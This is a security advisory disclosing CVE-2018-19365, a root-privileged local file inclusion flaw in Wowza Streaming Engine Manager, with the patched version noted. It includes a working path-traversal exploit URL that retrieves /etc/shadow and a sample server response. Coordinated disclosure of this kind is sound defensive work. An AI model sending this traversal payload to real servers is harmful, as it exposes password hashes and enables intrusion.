CVE-2018-19365: Root local file inclusion in Wowza SRM 4.7.4.01.
Aon’s Cyber Solutions Security Testing Team (formerly GDS) recently discovered a security vulnerability affecting the Wowza Streaming Engine Manager software version 4.7.4.01, CVE-2018-19365. The issue allows for local file inclusion with root privileges. Exploitation of this vulnerability requires authentication with an Administrator account, however a default administrator account with known or easily guessed passwords is commonly used.
ACS thanks Wowza for working together as part of the ACS coordinated disclosure process to identify, patch, and disclose this issue. Patches are currently available in version 4.7.5.02 and later.
Wowza Advisory:
https://github.com/WowzaMediaSystems/public_cve/blob/master/wowza-streaming-engine/CVE-2018-19365.txt
Details:
The Wowza Streaming Engine Manager application allows for unauthorized access to the local file system of the server via the ‘/enginemanager/server/logs/download’ endpoint on the “logName” parameter. This allows for local files such as ‘/etc/passwd’ or ‘/etc/shadow’’ to be extracted by attackers in the form of a zip file.
Exploit URL:
https://<host>/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/shadow&logSource=engine
Response:
HTTP/1.1 200 OK
Server: Winstone Servlet Engine v1.0.5
Content-Type: application/octet-stream Content-Disposition: attachement; filename=”shadow.zip”
Connection: Close
[ZIP FILE CONTENTS]
The contents of /etc/shadow are included in the downloaded shadow.zip file.
